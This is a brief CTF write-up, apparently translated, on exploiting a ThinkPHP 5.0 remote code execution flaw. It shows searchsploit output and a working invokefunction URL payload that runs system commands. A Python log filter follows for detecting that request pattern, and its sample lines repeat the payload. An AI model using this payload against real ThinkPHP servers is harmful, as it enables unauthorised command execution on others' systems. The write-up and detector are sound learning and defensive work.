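Start with the challenge title: "rce" tells us this is a remote code execution challenge.
Opening the challenge shows that the site is built on the ThinkPHP 5.0 framework.
Searching for thinkphp with the searchsploit tool gives the following results: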
[i] Unable to detect version in terms: thinkphp
[i] Enabling 'searchsploit --strict'
----------------------------------------------------- ---------------------------------
 Exploit Title                                       |  Path
----------------------------------------------------- ---------------------------------
ThinkPHP - Multiple PHP Injection RCEs (Metasploit)  | linux/remote/48333.rb
ThinkPHP 2.0 - 'index.php' Cross-Site Scripting      | php/webapps/33933.txt
ThinkPHP 5.0.23/5.1.31 - Remote Code Execution       | php/webapps/45978.txt
ThinkPHP 5.X - Remote Command Execution              | php/webapps/46150.txt
----------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
Next, run searchsploit -m 45978 to copy the exploit into the current directory. Viewing 45978.txt gives the exploit:
http://server/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();
Replace the content after vars[1][]= with a system command, and the flag can be found in the root directory.
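
From the defender's side, the request shape above is easy to spot in web access logs. The following Python filter is an added example, not part of the original write-up or of ThinkPHP. The log lines are constructed, and treating any backslash in the s= route as suspicious is an assumption generalised from the URL above.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /public/index.php?s=/index/index/hello HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1" 200 64',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /public/index.php?s=%2Findex%2F%255Cthink%255Capp%2Finvokefunction&function=call_user_func_array HTTP/1.1" 200 64',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /public/index.php?s=/blog/read&id=5 HTTP/1.1" 200 900',
]
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded values are normalised."""
    for _ in range(max_rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value

def classify(line):
    """Return the reasons a log line matches the invokefunction request shape."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    route = fully_decode(query.get("s", [""])[0]).lower()
    func = fully_decode(query.get("function", [""])[0]).lower()
    reasons = []
    if "\\" in route:  # assumption: normal routes never contain a namespace separator
        reasons.append("backslash in s= route")
    if "invokefunction" in route:
        reasons.append("invokefunction action")
    if func == "call_user_func_array":
        reasons.append("function=call_user_func_array")
    return reasons

def scan(lines):
    """Map each source IP to the set of reasons seen across its flagged requests."""
    hits = {}
    for line in lines:
        reasons = classify(line)
        if reasons:
            hits.setdefault(line.split()[0], set()).update(reasons)
    return hits

if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG).items():
        print(ip, sorted(reasons))
```

The third sample line is double percent-encoded, which is why the route is decoded until it stops changing before matching.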
